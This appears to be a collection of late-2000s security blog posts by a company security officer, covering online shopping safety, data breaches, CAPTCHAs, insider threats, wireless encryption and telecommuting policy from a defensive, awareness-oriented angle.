Happy "Cyber Monday" - what is widely considered to be the official start of the online shopping season.  After eating too much turkey, gravy, mashed potatoes, and stuffing on Thursday (and probably Friday, Saturday, and Sunday too!), then spending way too much time in line for Black Friday shopping deals that probably weren't worth getting up at 3am for, today is the first day back at work after the long holiday weekend.  As such, today is also the day that many people start buying presents online.

According to comScore, spending on Cyber Monday has historically reflected overall holiday season spending.  The question that I have though, "Is Cyber Monday relevant anymore?"  Many retailers now offer the option, even on Black Friday, to order items via their web site to get the same deals.  So, many of the specials that people were standing in line for on Friday could have been purchased online, at home, in your pajamas. 

From a security perspective, Cyber Monday is the start of a season where we attempt to educate users as much as possible as it relates to being aware of the "too good to be true" deals that may arrive in your inbox and have typically offered a couple of pointers to keep yourself safe online:

-- Shop only with vendors that you already know and trust.  Don't give your credit card information away to someone that you don't already have some kind of pre-existing shopping relationship with. 

-- Avoid clicking on what appear to be links to legitimate web sites in an email or IM.  If you want to go to the Land's End web site to shop, go to the URL directly.  The link may actually go to a look-alike site setup solely to steal information.
-- Ensure that web sites that are accepting credit card information and/or that you have to log into have SSL encryption on the pages that are processing this data.  This should be a given and a standard nowadays, but the lack of existence of encryption of your sensitive data should be your first red flag that your business should likely be taken elsewhere.

-- Look for seals from organizations from privacy enforcement organizations like TrustE and BBBOnline.  Although this isn't a guarantee that their site cannot be compromised, cooperation with these organizations means that they do not ask for sensitive information like social security number without explicitly explaining in their Privacy Policy why they are collecting it.  So you can at least be certain going in why you are being asked for something that you wouldn't normally provide.  You can then make an informed decision as to whether you want to take your business to another merchant.

These tips are not just important for Cyber Monday though.  They are relevant to the entire holiday season and for the entire year.  Sometimes with the rush and hurry to find the best deals for that must-have gift we let our guards down or think that it is too inconvenient to go through some of these extra steps.  The question then comes down to, whether you want to take a few extra minutes to make educated decisions about who you are giving your credit card data to now or risk spending a lot more time trying to clean up an avoidable mess later.

Here's to a fun, safe, and secure holiday season.  Cheers! :)

According to this story posted on Wired yesterday, a keylogger has been found on laptops being used in the space station.  The reported malware, W32.Gammima.AG (see here for description on Symantec's web site), has been around since August 2007 and steals passwords from a few (rather obscure here in the United States) online games.

You are thinking "So what?  What risk does an online game keylogger pose to a laptop on the space station?  Why should I care?"

As you know, we like to think bigger picture here.

Let's start with the obvious question of why the anti-virus software running on the laptop didn't immediately identify and stop a one year old virus?  I don't know about you, but that sends up lots of red flags to me!  This obviously begs the question of how long this keylogger has actually been resident on the laptop and if there are other, yet undetected, rootkits and keyloggers on those machines?  Also, what other computers were potentially exposed to these infected machines that this virus could have propagated to?  What information has been exposed to theft or compromise either from the laptops or from other exposed machines on the NASA network?  What was done with these laptops once the virus was detected?  Were they merely cleaned to the virus scanners standards (which clearly aren't that high!) or was the computer completely taken out of commission so that it could be wiped to Department of Defense specifications and re-imaged before it was redeployed? 
Obviously there are a lot of unanswered questions in relation to this story, and of course NASA will never make the answers to those questions public, but this certainly calls into question the validity of the security measures employed by one of the most important programs of the 20th and 21st centuries.  Where else within the federal government does the potential for similar security breaches exist?   Are potential data leakages like this something that the Department of Homeland Security is focused on preventing?  If not, they should be!  Let's be sure we aren't aiding and abetting the bad guys by giving them the exact information we are looking to protect!

According to this story a laptop that contained approximately 33,000 records of customers of the Clear system (Clear is a for-pay system that allows customers to go through a separate security line at some airports using a smartcard). 

Apparently the laptop has been found....in the same room that it was allegedly lost in.  The title of the article linked to above is "Laptop Discovery May End SFO Security Scare"....I couldn't disagree more.

If someone unauthorized had access to the room that the laptop was in when it disappeared, that same person had access to put the computer back after they were done with it (stealing data, installing a trojan to steal more data...the list goes on).  According to the story customer data on this laptop was NOT encrypted which means anyone who had access to the computer had unfettered access to all of the customer information stored on it which included names, addresses, birth dates, driver license numbers, and passport numbers.  Of course, now the TSA is saying that the computers must use encryption, but that is like buying flood insurance while your basement is under 8 feet of water.  Too little, too late.

This is a huge black eye for Verified Identity Pass, the company that operates the Clear program.  My favorite line in the article is where their CEO Steven Brill states "We don't believe the security or privacy of these would-be members will be compromised in any way."  The fact that their CEO would make a statement like that just underscores what little he and his company understand about security and the protection of customer information. 
Hopefully this will prompt the TSA into doing a more security oriented deep dive on all of their vendors.  It is important for them to know just how many other basements either are currently or are headed for 8 feet of water in their respective basements.  As a member of the DHS, the TSA already doesn't have a very good record as it relates to security.  Any proactive measures that they can take to ensure the security posture of their organization and the vendors they do business with will help mitigate future high-profile breaches.

CAPTCHAs - Completely Automated Public Turing test to tell Computers and Humans Apart.

In other words, an attempt at verification that a human is filling out a web form as opposed to an automated agent/bot.

Or, in other other words, a test that has become almost impossible for humans to even pass due to the increased levels of obfuscation being put into the tests themselves.

Usually CAPTCHAs are done via some kind of image where the user types in the contents of said image into a text box at the end of a web form.  If the user's guess is correct, then the form is successfully submitted, and whatever follow up action that is supposed to happen afterward is performed (e.g. successful signup to a mailing list, comment post to a blog, etc).

The problem is that in an effort to make these CAPTCHA images more and more difficult for software to break down to allow bots to bypass them, they have also been made very difficult for humans, those who are supposed to be able to read them, to figure out.

Take the following image that I was presented with on Facebook, a popular social networking site, this morning:

 

Are you kidding me?

Obviously the second word is "mountains", but I challenge even the most competent forensic experts to tell me what the first word is supposed to be.

Despite it's fallibilities, I can understand as a technical person the need to have technologies like this in place.  As a technical community, we need to make sure that we aren't making our products and systems impossible to use "in the name of security."  Users will only accept a certain amount of inconvenience before they go find solutions that are simpler to use while still providing acceptable levels of security.

According to Peter Gabriel's web site sometime on Sunday Night or Monday Morning their web servers were stolen from their data center. 

I wonder if they broke in with a Sledgehammer?  Or if they were Quiet and Alone?  I wonder if the RIAA will sue the thieves for stealing music?

Ok, enough jokes....

Kind of makes you wonder how they got in....or does it?  I've been speaking to several colleagues lately who either currently perform social engineering engagements or did them in previous lives and it is amazing to me the areas of buildings that they have been able to access and the confidential information that they have uncovered just by every day, common techniques that we all do: tailgating, acting like you misplaced your access badge, or just looking like you belong somewhere.

Then once they were in the data center, how did they access the cabinet that the servers were in?  Many cabinets go from the floor to the ceiling or have safeguards in place to prevent the cabinet from being compromised from on top.  They should also have at minimum either a keylock or combination lock (or both), not to mention that the data center should also have security cameras covering every square inch of floor space. 

We talk about proofs of concept very frequently where the occurrence of one crime is a finger pointing towards the potential occurrence of something much more damaging.  This is definitely one of those types of crimes.  If it can happen at this data center, what is to say that this same thing couldn't happen at any number of others as well?  What security policies does your data center have?  How well do they follow them?

We make a lot of assumptions with regards to the security of data centers, but all the technology controls in the world don't make a bit of difference if they can easily be bypassed.

According to this article posted at PC Pro, ScanSafe says that remote employees are more than twice as likely to be surfing porn than employees who work in the office. 

This is not a surprising stat as telecommuting takes a level of discipline on the part of the teleworker that is far and away greater than office-bound employees.  What is surprising to me is that companies are ALLOWING this type of web surfing to be taking place on their corporate computers!

Porn sites are one of the biggest security risks out there.  Porn sites commonly install malware, adware,  tracking cookies, and other security risks that could cause a security breach to your organization. 

In most cases you want to use technology as an enabler for employees to be as efficient as possible, particularly your remote employees who are frequently less scrutinized because most of management's attention is focused on the employees that are in the office every day.  This, however is one of those instances where technology needs to enforce the policies of the organization so that the company can protect itself and its intellectual property from compromise and disclosure.  Data leakage as a result of inappropriate employee web surfing and irresponsible organizational content filtering policies is one of the easiest insider threats to mitigate.  Companies should be doing everything that they can be to assure that this is not an avenue of information disclosure.

Whether it is iPods being shipped with malware, digital picture frames, navigation systems, or hard drives, the number of incidents of electronic equipment being shipped from the manufacturer with malware is disturbing!

How does this happen?  This is typically a by-product of PCs that are used for things that are outside their intended business purpose.  For example, if a computer's primary business function is to load software onto a digital picture frame or to test the ability of a computer to connect to and transfer files to the frame, then those should be the only parameters by which that machine is used.  It should not be used to plug in external USB drives, download videos and music off of the internet, or to surf porn sites.  Any of these activities are vectors of unnecessary risk and could end up infecting the PC with malware which will subsequently get passed onto other devices.

As the line between what is known as a PC and what actually runs the same type of software as your PC continues to blur you can expect to see more of these types of incidents occurring.  This is unfortunate because as we have become more dependent on technology in our every day lives and as the devices that we used have become more advanced, our level of confidence in those devices to function in a safe, secure, stable manner has declined significantly.  These sorts of compromises represent one of the biggest new threats to corporate networks and will be another one of the avenues used more prevalently by cyber criminals to steal sensitive, confidential, and personal information as malware continues its evolutionary process.

I ran across this article this morning which states that according to Deloitte that human error is the leading cause of security threats. I agree with this to a point.

I thought it was important to mention this concept as it is also a major point in the Security Awareness presentations that I do. Where my opinion differs is that I believe that human error is the leading cause of *insider* security threats, but not the leading cause of all security threats.

Perhaps I am being myopic because of the type of company that I work for, but I view intrusion as the result of public server vulnerability, virus infection, and social engineering to be a much larger issue.

That isn't however to take away from the importance of the insider threat. When I say "insider threat" am I referring to employees who are going out of their way to do something malicious or to try to access data that they know they shouldn't have access to? Yes, but I am also referring to employees to who stumble upon information due to lack of proper security controls or the maintenance thereof. For example, if you work in your Customer Support department and happened to stumble upon a spreadsheet named "Executive Salaries 2008.xls" somewhere out on a network share, that you had permission to view, would you open it? Perhaps you would report it, but I'll bet you a nickel that you would look at it first, maybe save a copy for yourself, or print it out on the closest printer to show your friends. These are examples of insider threats just as much as the over-eager security novice who is attempting cross site scripting attacks against your production systems in an attempt to learn.

According to the 2006 E-Crime Watch Survey insiders were responsible for 27% of all security incidents and 55% of respondents reported at least one incident that was the result of insider activity. That's more than 1 in 4 security incidents that happen as a result of an internal employee! That's a lot, especially in an age where most of what you read about in security publications talks about the latest worms, keyloggers, and other maladies looking to steal your financial data.

The article also states that "Another security worry is many line-of-business executives' tendency to see information security as solely IT's problem." If your company puts the responsibility of security solely with the IT department, they are missing the boat. Security should not rest with IT for the same reasons that it should not rest with Production Operations or Quality Assurance or any other department; they have their own agendas and their own core competencies to focus on. Adding "make sure we are secure" to that mix is a certain recipe for failure. Your security program implementation, maintenance, and enforcement should be handled by an independent (could be internal) source whose *main responsibility is the security program*.

The article concludes by making a statement in regards to the implementation of a corporate security program, "A prerequisite for effective information security is the implementation of a proactive information security strategy that is closely linked to the company's overall business strategy, business requirements, and key business drivers." This is completely true. One thing I would add onto it is "...and has the full support of the company's executive team." Without the support of the people who run the company, your program will barely get off the ground.

....or so networking equipment vendor 3Com would have you believe.

Today's blog entry is based off of an article posted by The Star Online which states that (when comparing the risks associated between wired and wireless networks) "the risks are the same as those posed to wired networks  the typical computer virus infection and odd worm-intrusion incident". Last I checked, worms and viruses, although significant risks in and of themselves, are far from the only risks facing wireless and wired networks.. What about the hacker next door who sets up a wireless sniffer to try to crack the encryption key used on your wireless network? Or the one who is just casually looking for completely open wireless networks to attach onto?

The article also states: "Whats even more interesting is that some of these organisations did not face any security threats and have found that the security of their networks either improved or remained unchanged when they moved to wireless" This has nothing to do with the deployment of wireless. There are three main encryption technologies used on wireless networks today: WEP (Wired Equivalency Protocol), WPA (Wi-Fi Protected Access), and WPA2 (version 2 of WPA) which actually consists of two versions: WPA2-Personal and WPA2-Enterprise. Nowhere in any of these acronyms is the word "security" used. Why? Because they do not provide "security". They provide encryption (which can be cracked) and some level of access control, but not "security". In this instance, as part of the deployment of wireless to the organization's internal network resources they may have employed some additional safeguards such as requiring authentication to a VPN after successful wireless connection, but this is an architectural change and is not related to the security of the wireless network.

The article also mentions that consumer-grade wireless networking equipment is less secure than enterprise grade equipment. Not true. Generally consumer and enterprise grade wireless access points support all of the current encryption protocols mentioned above. Unfortunately, not all of the equipment that is connecting to these access points (predominantly laptops) support these new protocols. This is especially true in organizations that deploy older, bargain basement type laptops whose internal wireless adapters may not even support encryption beyond basic WEP. Nevertheless, this is not a factor of the security of the access point. This is a factor of the capabilities of the machines connecting to the network. The security itself of the wireless access point is not lacking because it is a D-Link you bought for $75 from a local retailer versus a Cisco access point that may have cost several hundred.

Why am I being so hard on this article? Mainly because I keep hearing people trying to make the connection between wireless networks and security. In this case they are trying to make the connection between wireless deployment and _increased_ security! As I mentioned earlier, there are certainly some best practices that you can deploy as an organization if you are looking to go wireless, but again these are not security functions of the wireless network or the wireless network equipment itself, rather functions of your own architecture and safeguards put into place such that you limit what a potential criminal has access to even if they do manage to successfully get onto your wireless network.

Wireless is a wonderful technology and I am a big proponent of it (I use it all day between work and home), but wireless does not equal security. Please don't confuse the two!

How at risk are you to be a victim of identity theft?

According to the folks over the Privacy Rights Clearinghouse approximately 165 million data records of U.S. residents have been exposed due to security breaches since January, 2005. In 2007 there have been 278 breaches reported which account for over 75 million records.

Keep in mind that these numbers are for *reported* breaches by companies who are required to report such incidents. This only represents a small percentage of the number of businesses out there who might have your personally identifiable information.

Even if we take the 165M records number as being accurate, this means that we are all roughly at about a 50% risk of having our identities stolen as a result of these breaches! Granted, the information obtained could vary greatly from a hacker only obtaining your name and email address all the way to exposure of credit card numbers and your social security number. Both types are just as dangerous though. For example, if a hacker only obtains your name and email address they could use that information to send legitimate looking phishing messages to your inbox in an effort to get the rest of what they want.

So, what to do if you believe that your identity might have been stolen? Privacy Rights Clearinghouse has a comprehensive guide posted on their website which discusses not only how to pro actively stay on top of your credit (I would also recommend the Identity Theft Resource Center, but also things that you can do to prevent further damage from being done once your information does end up in the wrong hands.

One of the most important things to remember is that just because your data might have been compromised does not mean that you will be a victim of identity theft. Unfortunately, there is little that you can do to prevent this sort of thing from happening, but it is important, however to remain diligent in order to minimize how it will affect you.

It's going to be a wild last 3 months of the year for ISPs of all kinds.

Over the last 2-3 months we have seen over a 60% increase in mail traffic (mostly attributed to the Storm Worm and its many variants). Since the Christmas marketing season will soon be upon us I would not be surprised if internet email traffic at least doubled on top of where it is now before the year is out.

If you don't believe that you are equipped to handle this kind of additional load, NOW is the time to act!

Protect your mail infrastructure!

Protect your network!

Most of all, protect your business!

(We now return you to your regularly scheduled programming)

Another part of my role here at MX Logic in addition to being in charge of our Threat Research group is that of our security officer. This includes not only security education, but also implementation and enforcement of our internal security policies and procedures.

One of the things that I have been putting a lot of thought into lately is the security implication of telecommuting. Telecommuting is becoming much more commonplace among many different types of organizations now that more and more companies are adopting mobile computing practices. This often comes at the cost of security, however. In an effort to make employees more productive when they are away from the office (either traveling or working from home), the security implications of opening up your network in this way are not always considered...or if they are considered, they are set aside for the trade-off of getting more out of your workforce.

So, what's the big deal? So what if Jane wants to work on her desk PC at home when she telecommutes instead of using her laptop?

There was an article posted recently on darkreading.com that said that 94% of Federal CISOs do not believe that telework/telecommuting programs are a threat to security. It also stated that 83% of Federal CISOs are "interested" in mobile endpoint certification for compliance with the Federal Information Security Management Act. Being interested means that they aren't doing it yet, but think it is a good idea.

These numbers don't add up to me. How can you not be concerned about the security implications of telecommuting, but at the same time haven't even certified that your own equipment is in compliance with your own Information Security Management Act?

Let's discuss some best practices that companies can use when implementing a work from home policy:

-- Setup access control so that only your company authorized PCs are allowed to connect to your VPN. If Jane has been connecting her work laptop to her own home unsecured wireless network or to the local Starbuck's Wi-Fi network, you still can't guarantee that she won't be trying to spread a virus across your corporate infrastructure, but you have more control over this PC than you do Jane's home PC that she shares with her two teenagers.

-- Implement as many defense-in-depth strategies on your company PCs as possible. This includes at least one anti-virus product and some kind of Host-Based Intrusion Prevention System (HIPS).

-- Disable ports on the PC which allow users to plug in external storage devices like USB drives. Not only are these devices handy if someone wants to steal your corporate secrets off of your corporate intranet, but they are an easy injection point for malware.

-- Turn off the wireless radio when the PC is going to be hard wired to the network. It will prevent accidental connection to a potentially rogue wireless network. A nice side effect is that it will increase battery life on a single charge as well since the radio is such a wear on the battery when it is on.

As with anything technology related, technology solutions are only part of the answer. User education is also a large piece of this pie as well. One of the most important jobs of a security officer is security awareness and making sure that security is part of the consciousness of every employee at an organization. It is one thing to put policies and technology in place which enforce security, but it is another entirely to make sure everyone in your company is also aware of those policies and knows and understands how to follow them. The backend technology should be in place to enforce those policies, but it is the end user's responsibility to try to not put themselves into a vulnerable position and that is done through education, education, and more education.